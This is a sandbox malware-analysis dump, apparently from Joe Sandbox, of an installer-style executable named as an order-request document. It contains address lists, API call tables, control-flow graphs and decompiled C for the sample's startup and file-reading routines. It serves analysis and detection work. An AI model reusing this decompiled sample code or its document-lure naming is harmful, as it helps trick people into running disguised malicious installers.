                                                              0x00403db5
                                                              0x00403dc2
                                                              0x00403dc9
                                                              0x00403dc9
                                                              0x00403dca
                                                              0x00403dca
                                                              0x00403dcf
                                                              0x00403dd5
                                                              0x00403ddc
                                                              0x00403de2
                                                              0x00403de4
                                                              0x00403e24
                                                              0x00403e29
                                                              0x00403e2e
                                                              0x00403e2e
                                                              0x00403e33
                                                              0x00403e3c
                                                              0x00403e3e
                                                              0x00403e43
                                                              0x00403e49
                                                              0x00403e4d
                                                              0x00403e4d
                                                              0x00403e52
                                                              0x00403e58
                                                              0x00000000
                                                              0x00000000
                                                              0x00403e63
                                                              0x00403e69
                                                              0x00000000
                                                              0x00000000
                                                              0x00403e72
                                                              0x00403e7a
                                                              0x00403e7f
                                                              0x00403e82
                                                              0x00403e88
                                                              0x00403e8d
                                                              0x00403e90
                                                              0x00403e96
                                                              0x00403e9b
                                                              0x00403e9e
                                                              0x00403ea4
                                                              0x00403eac
                                                              0x00403eb2
                                                              0x00403eb8
                                                              0x00403ebc
                                                              0x00403ec3
                                                              0x00403ec3
                                                              0x00403ec3
                                                              0x00403ecd
                                                              0x00403edf
                                                              0x00403eeb
                                                              0x00403ef0
                                                              0x00403efa
                                                              0x00403f00
                                                              0x00403f02
                                                              0x00403f07
                                                              0x00403f04
                                                              0x00403f04
                                                              0x00403f04
                                                              0x00403f17
                                                              0x00403f2f
                                                              0x00403f31
                                                              0x00403f37
                                                              0x00403f4c
                                                              0x00403f39
                                                              0x00403f42
                                                              0x00403f44
                                                              0x00403f44
                                                              0x00403f52
                                                              0x00403f62
                                                              0x00403f78
                                                              0x00403f7f
                                                              0x00403f85
                                                              0x00403f89
                                                              0x00403f8e
                                                              0x00403f90
                                                              0x00000000
                                                              0x00403f96
                                                              0x00403f96
                                                              0x00403f98
                                                              0x00000000
                                                              0x00000000
                                                              0x00403f9e
                                                              0x00403fa2
                                                              0x00403fc7
                                                              0x00403fcd
                                                              0x00403fd3
                                                              0x00403fd5
                                                              0x00000000
                                                              0x00000000
                                                              0x00403ffb
                                                              0x00404001
                                                              0x00404003
                                                              0x00404008
                                                              0x00000000
                                                              0x00000000
                                                              0x0040400e
                                                              0x00404011
                                                              0x00404014
                                                              0x0040402b
                                                              0x00404037
                                                              0x00404050
                                                              0x00404056
                                                              0x0040405a
                                                              0x0040405f
                                                              0x00404065
                                                              0x00000000
                                                              0x00000000
                                                              0x0040406f
                                                              0x0040407a
                                                              0x00000000
                                                              0x0040407a
                                                              0x00403fa4
                                                              0x00403faa
                                                              0x00000000
                                                              0x00000000
                                                              0x00403fb0
                                                              0x00403fb6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403fbc
                                                              0x00403f90
                                                              0x00404087
                                                              0x00404093
                                                              0x0040409a
                                                              0x00000000
                                                              0x00403de6
                                                              0x00403de6
                                                              0x00403de9
                                                              0x00403e1c
                                                              0x00403e1c
                                                              0x00403e1e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403e1e
                                                              0x00403deb
                                                              0x00403def
                                                              0x00403df4
                                                              0x00403df6
                                                              0x00000000
                                                              0x00000000
                                                              0x00403e06
                                                              0x00403e0e
                                                              0x00000000
                                                              0x00403e14
                                                              0x00403c42
                                                              0x00403c42
                                                              0x00403c46
                                                              0x00403c4b
                                                              0x00403c5a
                                                              0x00403c5a
                                                              0x00403c63
                                                              0x00403c6c
                                                              0x00403c77
                                                              0x00403c77
                                                              0x00403c83
                                                              0x00403c9f
                                                              0x00403ca2
                                                              0x00403cb5
                                                              0x00403cbb
                                                              0x00403d5e
                                                              0x00000000
                                                              0x00403d67
                                                              0x00403cc1
                                                              0x00403cce
                                                              0x00403cd0
                                                              0x00403cd2
                                                              0x00403cf1
                                                              0x00403cf1
                                                              0x00403cf4
                                                              0x00403cf9
                                                              0x00403cfc
                                                              0x00403d0c
                                                              0x00403d0d
                                                              0x00403d0f
                                                              0x00403d45
                                                              0x00403d58
                                                              0x00000000
                                                              0x00403d58
                                                              0x00403d11
                                                              0x00403d17
                                                              0x00403d30
                                                              0x00403d35
                                                              0x00403d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00403d39
                                                              0x00403d25
                                                              0x00403d25
                                                              0x00403d27
                                                              0x00403d27
                                                              0x00000000
                                                              0x00403d27
                                                              0x00403d1a
                                                              0x00403d1f
                                                              0x00000000
                                                              0x00403d1f
                                                              0x00403cfe
                                                              0x00403d04
                                                              0x00000000
                                                              0x00000000
                                                              0x00403d06
                                                              0x00000000
                                                              0x00403d06
                                                              0x00403cf6
                                                              0x00000000
                                                              0x00403cf6
                                                              0x00403cdc
                                                              0x00403ce3
                                                              0x00403ce9
                                                              0x00403ceb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403ceb
                                                              0x00403ca7
                                                              0x00000000
                                                              0x00403c85
                                                              0x00403c8b
                                                              0x00403c95
                                                              0x004040a0
                                                              0x004040a6
                                                              0x004040a8
                                                              0x004040ae
                                                              0x004040b3
                                                              0x004040b9
                                                              0x004040b9
                                                              0x004040ae
                                                              0x004040c3
                                                              0x00000000
                                                              0x004040c3
                                                              0x00403c83

                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C5A
                                                              • ShowWindow.USER32(?), ref: 00403C77
                                                              • DestroyWindow.USER32 ref: 00403C8B
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CA7
                                                              • GetDlgItem.USER32(?,?), ref: 00403CC8
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CDC
                                                              • IsWindowEnabled.USER32(00000000), ref: 00403CE3
                                                              • GetDlgItem.USER32(?,00000001), ref: 00403D91
                                                              • GetDlgItem.USER32(?,00000002), ref: 00403D9B
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DB5
                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E06
                                                              • GetDlgItem.USER32(?,00000003), ref: 00403EAC
                                                              • ShowWindow.USER32(00000000,?), ref: 00403ECD
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EDF
                                                              • EnableWindow.USER32(?,?), ref: 00403EFA
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F10
                                                              • EnableMenuItem.USER32(00000000), ref: 00403F17
                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F2F
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F42
                                                              • lstrlenW.KERNEL32(007A1F40,?,007A1F40,Overcaustically Setup), ref: 00403F6B
                                                              • SetWindowTextW.USER32(?,007A1F40), ref: 00403F7F
                                                              • ShowWindow.USER32(?,0000000A), ref: 004040B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID: Overcaustically Setup
                                                              • API String ID: 3282139019-1715260814
                                                              • Opcode ID: 426f01107b3485b81cd68b564b608a380621adfe565edd953016c1e22f2525a4
                                                              • Instruction ID: cca83e8e3ea8fbb2d4c878b4d098dd65b90ea533b8cc41e08898a63a3c4fefdb
                                                              • Opcode Fuzzy Hash: 426f01107b3485b81cd68b564b608a380621adfe565edd953016c1e22f2525a4
                                                              • Instruction Fuzzy Hash: FFC1BE71504204AFDB20AF61ED84E2B7BA8EB86745F00893EF641B11F0CB3D9952DB5E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 289 40387b-403893 call 406408 292 403895-4038a5 call 405f79 289->292 293 4038a7-4038de call 405eff 289->293 302 403901-40392a call 403b51 call 405aee 292->302 298 4038e0-4038f1 call 405eff 293->298 299 4038f6-4038fc lstrcatW 293->299 298->299 299->302 307 403930-403935 302->307 308 4039bc-4039c4 call 405aee 302->308 307->308 309 40393b-403963 call 405eff 307->309 314 4039d2-4039f7 LoadImageW 308->314 315 4039c6-4039cd call 406054 308->315 309->308 316 403965-403969 309->316 318 403a78-403a80 call 40140b 314->318 319 4039f9-403a29 RegisterClassW 314->319 315->314 320 40397b-403987 lstrlenW 316->320 321 40396b-403978 call 405a13 316->321 333 403a82-403a85 318->333 334 403a8a-403a95 call 403b51 318->334 322 403b47 319->322 323 403a2f-403a73 SystemParametersInfoW CreateWindowExW 319->323 327 403989-403997 lstrcmpiW 320->327 328 4039af-4039b7 call 4059e6 call 406032 320->328 321->320 326 403b49-403b50 322->326 323->318 327->328 332 403999-4039a3 GetFileAttributesW 327->332 328->308 337 4039a5-4039a7 332->337 338 4039a9-4039aa call 405a32 332->338 333->326 342 403a9b-403ab5 ShowWindow call 40639c 334->342 343 403b1e-403b1f call 405264 334->343 337->328 337->338 338->328 350 403ac1-403ad3 GetClassInfoW 342->350 351 403ab7-403abc call 40639c 342->351 346 403b24-403b26 343->346 348 403b40-403b42 call 40140b 346->348 349 403b28-403b2e 346->349 348->322 349->333 352 403b34-403b3b call 40140b 349->352 355 403ad5-403ae5 GetClassInfoW RegisterClassW 350->355 356 403aeb-403b0e DialogBoxParamW call 40140b 350->356 351->350 352->333 355->356 360 403b13-403b1c call 4037cb 356->360 360->326
                                                              C-Code - Quality: 96%
                                                              			E0040387B(void* __eflags) {
                                                              				intOrPtr _v4;
                                                              				intOrPtr _v8;
                                                              				int _v12;
                                                              				void _v16;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr* _t22;
                                                              				void* _t30;
                                                              				void* _t32;
                                                              				int _t33;
                                                              				void* _t36;
                                                              				int _t39;
                                                              				int _t40;
                                                              				intOrPtr _t41;
                                                              				int _t44;
                                                              				short _t63;
                                                              				WCHAR* _t65;
                                                              				signed char _t69;
                                                              				WCHAR* _t76;
                                                              				intOrPtr _t82;
                                                              				WCHAR* _t87;
                                                              
                                                              				_t82 =  *0x7a8a50;
                                                              				_t22 = E00406408(2);
                                                              				_t90 = _t22;
                                                              				if(_t22 == 0) {
                                                              					_t76 = 0x7a1f40;
                                                              					L"1033" = 0x30;
                                                              					 *0x7b5002 = 0x78;
                                                              					 *0x7b5004 = 0;
                                                              					E00405EFF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f40, 0);
                                                              					__eflags =  *0x7a1f40;
                                                              					if(__eflags == 0) {
                                                              						E00405EFF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M0040838C, 0x7a1f40, 0);
                                                              					}
                                                              					lstrcatW(L"1033", _t76);
                                                              				} else {
                                                              					E00405F79(L"1033",  *_t22() & 0x0000ffff);
                                                              				}
                                                              				E00403B51(_t78, _t90);
                                                              				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis";
                                                              				 *0x7a8ac0 =  *0x7a8a58 & 0x00000020;
                                                              				 *0x7a8adc = 0x10000;
                                                              				if(E00405AEE(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis") != 0) {
                                                              					L16:
                                                              					if(E00405AEE(_t98, _t86) == 0) {
                                                              						E00406054(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                              					}
                                                              					_t30 = LoadImageW( *0x7a8a40, 0x67, 1, 0, 0, 0x8040); // executed
                                                              					 *0x7a7a28 = _t30;
                                                              					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                              						L21:
                                                              						if(E0040140B(0) == 0) {
                                                              							_t32 = E00403B51(_t78, __eflags);
                                                              							__eflags =  *0x7a8ae0;
                                                              							if( *0x7a8ae0 != 0) {
                                                              								_t33 = E00405264(_t32, 0);
                                                              								__eflags = _t33;
                                                              								if(_t33 == 0) {
                                                              									E0040140B(1);
                                                              									goto L33;
                                                              								}
                                                              								__eflags =  *0x7a7a0c; // 0x0
                                                              								if(__eflags == 0) {
                                                              									E0040140B(2);
                                                              								}
                                                              								goto L22;
                                                              							}
                                                              							ShowWindow( *0x7a1f20, 5); // executed
                                                              							_t39 = E0040639C("RichEd20"); // executed
                                                              							__eflags = _t39;
                                                              							if(_t39 == 0) {
                                                              								E0040639C("RichEd32");
                                                              							}
                                                              							_t87 = L"RichEdit20W";
                                                              							_t40 = GetClassInfoW(0, _t87, 0x7a79e0);
                                                              							__eflags = _t40;
                                                              							if(_t40 == 0) {
                                                              								GetClassInfoW(0, L"RichEdit", 0x7a79e0);
                                                              								 *0x7a7a04 = _t87;
                                                              								RegisterClassW(0x7a79e0);
                                                              							}
                                                              							_t41 =  *0x7a7a20; // 0x0
                                                              							_t44 = DialogBoxParamW( *0x7a8a40, _t41 + 0x00000069 & 0x0000ffff, 0, E00403C1E, 0); // executed
                                                              							E004037CB(E0040140B(5), 1);
                                                              							return _t44;
                                                              						}
                                                              						L22:
                                                              						_t36 = 2;
                                                              						return _t36;
                                                              					} else {
                                                              						_t78 =  *0x7a8a40;
                                                              						 *0x7a79e4 = E00401000;
                                                              						 *0x7a79f0 =  *0x7a8a40;
                                                              						 *0x7a79f4 = _t30;
                                                              						 *0x7a7a04 = 0x40a3a0;
                                                              						if(RegisterClassW(0x7a79e0) == 0) {
                                                              							L33:
                                                              							__eflags = 0;
                                                              							return 0;
                                                              						}
                                                              						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                              						 *0x7a1f20 = CreateWindowExW(0x80, 0x40a3a0, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a40, 0);
                                                              						goto L21;
                                                              					}
                                                              				} else {
                                                              					_t78 =  *(_t82 + 0x48);
                                                              					if( *(_t82 + 0x48) == 0) {
                                                              						goto L16;
                                                              					}
                                                              					_t76 = 0x7a69e0;
                                                              					E00405EFF( *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a78 + _t78 * 2,  *0x7a8a78 +  *(_t82 + 0x4c) * 2, 0x7a69e0, 0);
                                                              					_t63 =  *0x7a69e0; // 0x43
                                                              					if(_t63 == 0) {
                                                              						goto L16;
                                                              					}
                                                              					if(_t63 == 0x22) {
                                                              						_t76 = 0x7a69e2;
                                                              						 *((short*)(E00405A13(0x7a69e2, 0x22))) = 0;
                                                              					}
                                                              					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                              					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                              						L15:
                                                              						E00406032(_t86, E004059E6(_t76));
                                                              						goto L16;
                                                              					} else {
                                                              						_t69 = GetFileAttributesW(_t76);
                                                              						if(_t69 == 0xffffffff) {
                                                              							L14:
                                                              							E00405A32(_t76);
                                                              							goto L15;
                                                              						}
                                                              						_t98 = _t69 & 0x00000010;
                                                              						if((_t69 & 0x00000010) != 0) {
                                                              							goto L15;
                                                              						}
                                                              						goto L14;
                                                              					}
                                                              				}
                                                              			}

























                                                              0x00403881
                                                              0x0040388a
                                                              0x00403891
                                                              0x00403893
                                                              0x004038a7
                                                              0x004038b9
                                                              0x004038c2
                                                              0x004038cb
                                                              0x004038d2
                                                              0x004038d7
                                                              0x004038de
                                                              0x004038f1
                                                              0x004038f1
                                                              0x004038fc
                                                              0x00403895
                                                              0x004038a0
                                                              0x004038a0
                                                              0x00403901
                                                              0x0040390b
                                                              0x00403914
                                                              0x00403919
                                                              0x0040392a
                                                              0x004039bc
                                                              0x004039c4
                                                              0x004039cd
                                                              0x004039cd
                                                              0x004039e3
                                                              0x004039e9
                                                              0x004039f7
                                                              0x00403a78
                                                              0x00403a80
                                                              0x00403a8a
                                                              0x00403a8f
                                                              0x00403a95
                                                              0x00403b1f
                                                              0x00403b24
                                                              0x00403b26
                                                              0x00403b42
                                                              0x00000000
                                                              0x00403b42
                                                              0x00403b28
                                                              0x00403b2e
                                                              0x00403b36
                                                              0x00403b36
                                                              0x00000000
                                                              0x00403b2e
                                                              0x00403aa3
                                                              0x00403aae
                                                              0x00403ab3
                                                              0x00403ab5
                                                              0x00403abc
                                                              0x00403abc
                                                              0x00403ac7
                                                              0x00403acf
                                                              0x00403ad1
                                                              0x00403ad3
                                                              0x00403adc
                                                              0x00403adf
                                                              0x00403ae5
                                                              0x00403ae5
                                                              0x00403aeb
                                                              0x00403b04
                                                              0x00403b15
                                                              0x00000000
                                                              0x00403b1a
                                                              0x00403a82
                                                              0x00403a84
                                                              0x00000000
                                                              0x004039f9
                                                              0x004039f9
                                                              0x00403a05
                                                              0x00403a0f
                                                              0x00403a15
                                                              0x00403a1a
                                                              0x00403a29
                                                              0x00403b47
                                                              0x00403b47
                                                              0x00000000
                                                              0x00403b47
                                                              0x00403a38
                                                              0x00403a73
                                                              0x00000000
                                                              0x00403a73
                                                              0x00403930
                                                              0x00403930
                                                              0x00403935
                                                              0x00000000
                                                              0x00000000
                                                              0x00403943
                                                              0x00403955
                                                              0x0040395a
                                                              0x00403963
                                                              0x00000000
                                                              0x00000000
                                                              0x00403969
                                                              0x0040396b
                                                              0x00403978
                                                              0x00403978
                                                              0x00403981
                                                              0x00403987
                                                              0x004039af
                                                              0x004039b7
                                                              0x00000000
                                                              0x00403999
                                                              0x0040399a
                                                              0x004039a3
                                                              0x004039a9
                                                              0x004039aa
                                                              0x00000000
                                                              0x004039aa
                                                              0x004039a5
                                                              0x004039a7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004039a7
                                                              0x00403987

                                                              APIs
                                                                • Part of subcall function 00406408: GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
                                                                • Part of subcall function 00406408: GetProcAddress.KERNEL32(00000000,?), ref: 00406435
                                                              • lstrcatW.KERNEL32(1033,007A1F40), ref: 004038FC
                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis,1033,007A1F40,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F40,00000000,00000002,762E3420), ref: 0040397C
                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis,1033,007A1F40,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F40,00000000), ref: 0040398F
                                                              • GetFileAttributesW.KERNEL32(Call), ref: 0040399A
                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis), ref: 004039E3
                                                                • Part of subcall function 00405F79: wsprintfW.USER32 ref: 00405F86
                                                              • RegisterClassW.USER32(007A79E0), ref: 00403A20
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A38
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A6D
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403AA3
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,007A79E0), ref: 00403ACF
                                                              • GetClassInfoW.USER32(00000000,RichEdit,007A79E0), ref: 00403ADC
                                                              • RegisterClassW.USER32(007A79E0), ref: 00403AE5
                                                              • DialogBoxParamW.USER32(?,00000000,00403C1E,00000000), ref: 00403B04
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$yz
                                                              • API String ID: 1975747703-4104693600
                                                              • Opcode ID: d6a2569dce1583fa4271488535ea6afbb2ec52d86251b0d01a743b5b25147845
                                                              • Instruction ID: b5c0bd5baa1962433b8b11afb21299241a1e412529c89f65b595a7484f15debb
                                                              • Opcode Fuzzy Hash: d6a2569dce1583fa4271488535ea6afbb2ec52d86251b0d01a743b5b25147845
                                                              • Instruction Fuzzy Hash: E761A570240600AED620BF669D46F2B3A6CEBC5B45F40857FF941B22E2DB7C9901CB6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 363 402dee-402e3c GetTickCount GetModuleFileNameW call 405c07 366 402e48-402e76 call 406032 call 405a32 call 406032 GetFileSize 363->366 367 402e3e-402e43 363->367 375 402f63-402f71 call 402d8a 366->375 376 402e7c 366->376 368 403020-403024 367->368 382 402f73-402f76 375->382 383 402fc6-402fcb 375->383 378 402e81-402e98 376->378 380 402e9a 378->380 381 402e9c-402ea5 call 40321f 378->381 380->381 389 402eab-402eb2 381->389 390 402fcd-402fd5 call 402d8a 381->390 385 402f78-402f90 call 403235 call 40321f 382->385 386 402f9a-402fc4 GlobalAlloc call 403235 call 403027 382->386 383->368 385->383 409 402f92-402f98 385->409 386->383 414 402fd7-402fe8 386->414 394 402eb4-402ec8 call 405bc2 389->394 395 402f2e-402f32 389->395 390->383 400 402f3c-402f42 394->400 412 402eca-402ed1 394->412 399 402f34-402f3b call 402d8a 395->399 395->400 399->400 405 402f51-402f5b 400->405 406 402f44-402f4e call 4064b9 400->406 405->378 413 402f61 405->413 406->405 409->383 409->386 412->400 418 402ed3-402eda 412->418 413->375 415 402ff0-402ff5 414->415 416 402fea 414->416 419 402ff6-402ffc 415->419 416->415 418->400 420 402edc-402ee3 418->420 419->419 422 402ffe-403019 SetFilePointer call 405bc2 419->422 420->400 421 402ee5-402eec 420->421 421->400 423 402eee-402f0e 421->423 426 40301e 422->426 423->383 425 402f14-402f18 423->425 427 402f20-402f28 425->427 428 402f1a-402f1e 425->428 426->368 427->400 429 402f2a-402f2c 427->429 428->413 428->427 429->400
                                                              C-Code - Quality: 80%
                                                              			E00402DEE(void* __eflags, signed int _a4) {
                                                              				DWORD* _v8;
                                                              				DWORD* _v12;
                                                              				void* _v16;
                                                              				intOrPtr _v20;
                                                              				long _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				intOrPtr _v40;
                                                              				signed int _v44;
                                                              				long _t43;
                                                              				signed int _t50;
                                                              				void* _t53;
                                                              				void* _t57;
                                                              				intOrPtr* _t59;
                                                              				long _t60;
                                                              				signed int _t65;
                                                              				signed int _t70;
                                                              				signed int _t71;
                                                              				signed int _t77;
                                                              				intOrPtr _t80;
                                                              				long _t82;
                                                              				signed int _t85;
                                                              				signed int _t87;
                                                              				void* _t89;
                                                              				signed int _t90;
                                                              				signed int _t93;
                                                              				void* _t94;
                                                              
                                                              				_t82 = 0;
                                                              				_v12 = 0;
                                                              				_v8 = 0;
                                                              				_t43 = GetTickCount();
                                                              				_t91 = L"C:\\Users\\Arthur\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe";
                                                              				 *0x7a8a4c = _t43 + 0x3e8;
                                                              				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", 0x400);
                                                              				_t89 = E00405C07(_t91, 0x80000000, 3);
                                                              				_v16 = _t89;
                                                              				 *0x40a018 = _t89;
                                                              				if(_t89 == 0xffffffff) {
                                                              					return L"Error launching installer";
                                                              				}
                                                              				_t92 = L"C:\\Users\\Arthur\\Desktop";
                                                              				E00406032(L"C:\\Users\\Arthur\\Desktop", _t91);
                                                              				E00406032(L"Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", E00405A32(_t92));
                                                              				_t50 = GetFileSize(_t89, 0);
                                                              				__eflags = _t50;
                                                              				 *0x7976fc = _t50;
                                                              				_t93 = _t50;
                                                              				if(_t50 <= 0) {
                                                              					L24:
                                                              					E00402D8A(1);
                                                              					__eflags =  *0x7a8a54 - _t82;
                                                              					if( *0x7a8a54 == _t82) {
                                                              						goto L29;
                                                              					}
                                                              					__eflags = _v8 - _t82;
                                                              					if(_v8 == _t82) {
                                                              						L28:
                                                              						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                              						_t94 = _t53;
                                                              						E00403235( *0x7a8a54 + 0x1c);
                                                              						_push(_v24);
                                                              						_push(_t94);
                                                              						_push(_t82);
                                                              						_push(0xffffffff); // executed
                                                              						_t57 = E00403027(); // executed
                                                              						__eflags = _t57 - _v24;
                                                              						if(_t57 == _v24) {
                                                              							__eflags = _v44 & 0x00000001;
                                                              							 *0x7a8a50 = _t94;
                                                              							 *0x7a8a58 =  *_t94;
                                                              							if((_v44 & 0x00000001) != 0) {
                                                              								 *0x7a8a5c =  *0x7a8a5c + 1;
                                                              								__eflags =  *0x7a8a5c;
                                                              							}
                                                              							_t40 = _t94 + 0x44; // 0x44
                                                              							_t59 = _t40;
                                                              							_t85 = 8;
                                                              							do {
                                                              								_t59 = _t59 - 8;
                                                              								 *_t59 =  *_t59 + _t94;
                                                              								_t85 = _t85 - 1;
                                                              								__eflags = _t85;
                                                              							} while (_t85 != 0);
                                                              							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                              							 *(_t94 + 0x3c) = _t60;
                                                              							E00405BC2(0x7a8a60, _t94 + 4, 0x40);
                                                              							__eflags = 0;
                                                              							return 0;
                                                              						}
                                                              						goto L29;
                                                              					}
                                                              					E00403235( *0x78b6f4);
                                                              					_t65 = E0040321F( &_a4, 4);
                                                              					__eflags = _t65;
                                                              					if(_t65 == 0) {
                                                              						goto L29;
                                                              					}
                                                              					__eflags = _v12 - _a4;
                                                              					if(_v12 != _a4) {
                                                              						goto L29;
                                                              					}
                                                              					goto L28;
                                                              				} else {
                                                              					do {
                                                              						_t90 = _t93;
                                                              						asm("sbb eax, eax");
